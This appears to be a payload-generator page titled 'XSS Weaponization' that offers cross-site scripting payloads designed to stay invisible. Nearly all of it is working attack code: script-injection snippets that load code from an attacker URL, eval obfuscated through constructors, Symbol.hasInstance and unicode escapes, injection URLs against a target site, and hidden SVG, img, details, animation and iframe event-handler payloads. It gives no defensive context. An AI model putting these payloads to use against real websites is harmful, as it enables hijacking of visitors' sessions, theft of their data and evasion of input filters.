🛡️ XSS Weaponization
💡 Generate weaponized payloads that are invisible on the page.
0 - JavaScript_content
Base JavaScript Code
eval('var a=document.createElement(\'script\');a.src=\'arr0w1_url\';document.body.appendChild(a)')
Note: eval(CODE) <=> []["filter"]["constructor"](CODE)()
[]["filter"]["constructor"]('var a=document.createElement(\'script\');a.src=\'arr0w1_url\';document.body.appendChild(a)')()
eval(atob('arr0w1_base64'))
Note: using ` \ {} [] :
`eval\x28atob\x28\x27arr0w1_base64\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval}
Note: 等价字符串 \x61 \u0061 \u{61} \u{000000061}
⚠️ Will be triggered when someone visits the URL:
https://target.com/page?title="><script>eval(location.hash.split(% 27 % 23 % 27)[1])</script><i id="#'eval\x28atob\x28\x27arr0w1_base64\x27\x29\x29'instanceof{[Symbol['hasInstance']]:eval}
⚠️ Step 1. Injection
eval(location.hash.slice(1))
// or
[]['constructor']['constructor']`a${location['hash']['slice']`1`}```
// or
setTimeout`\u0065\u0076\u0061\u006c\u0028\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0068\u0061\u0073\u0068\u002e\u0073\u006c\u0069\u0063\u0065\u0028\u0031\u0029\u0029`
⚠️ Step 2. Execution - Will be triggered when someone visits the URL:
https://target.com/page_with_the_payload#arr0w1_on_event_js
// or
https://target.com/page_with_the_payload#'eval\x28atob\x28\x27arr0w1_base64\x27\x29\x29'instanceof{[Symbol['hasInstance']]:eval}
"><svg style=display:none><set onbegin="ARR0W1_ON_EVENT_JS_PLACEHOLDER" dur=1s></svg><x id="
"><svg style=display:none><set onbegin=`eval\x28atob\x28\x27ARR0W1_BASE64_PLACEHOLDER\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval} dur=1s></svg><x id="
"><svg style=display:none><set onbegin=[]['filter']['constructor'](atob('ARR0W1_BASE64_PLACEHOLDER'))() dur=1s></svg><x id="
"><svg style=display:none><animate onrepeat="ARR0W1_ON_EVENT_JS_PLACEHOLDER" dur=1s repeatCount=2></svg><x id="
"><svg style=display:none><animate onrepeat=`eval\x28atob\x28\x27ARR0W1_BASE64_PLACEHOLDER\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval} dur=1s repeatCount=2></svg><x id="
"><img src id=ARR0W1_BASE64_PLACEHOLDER onerror=eval(atob(this.id))><x id="
"><img src onerror=`eval\x28atob\x28\x27ARR0W1_BASE64_PLACEHOLDER\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval}><x id="
"><details open ontoggle="ARR0W1_ON_EVENT_JS_PLACEHOLDER" style=display:none></details><x id="
"><details open ontoggle=`eval\x28atob\x28\x27ARR0W1_BASE64_PLACEHOLDER\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval} style=display:none></details><x id="
"><style>@keyframes x{}</style><i style="animation-name:x" onanimationend="ARR0W1_ON_EVENT_JS_PLACEHOLDER"></i><x id="
"><style>@keyframes x{}</style><i style="animation-name:x" onanimationend=`eval\x28atob\x28\x27ARR0W1_BASE64_PLACEHOLDER\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval}></i><x id="
"><style>@keyframes x{}</style><i style="animation-name:x" onwebkitanimationend="ARR0W1_ON_EVENT_JS_PLACEHOLDER"></i><x id="
"><style>@keyframes x{}</style><i style="animation-name:x" onwebkitanimationend=`eval\x28atob\x28\x27ARR0W1_BASE64_PLACEHOLDER\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval}></i><x id="
<iframe style=display:none src="javascript:ARR0W1_ON_EVENT_JS_PLACEHOLDER">
<iframe style=display:none src="javascript:`eval\x28atob\x28\x27ARR0W1_BASE64_PLACEHOLDER\x27\x29\x29`instanceof{[Symbol[`hasInstance`]]:eval}">
💡 Generate weaponized payloads that are invisible on the page.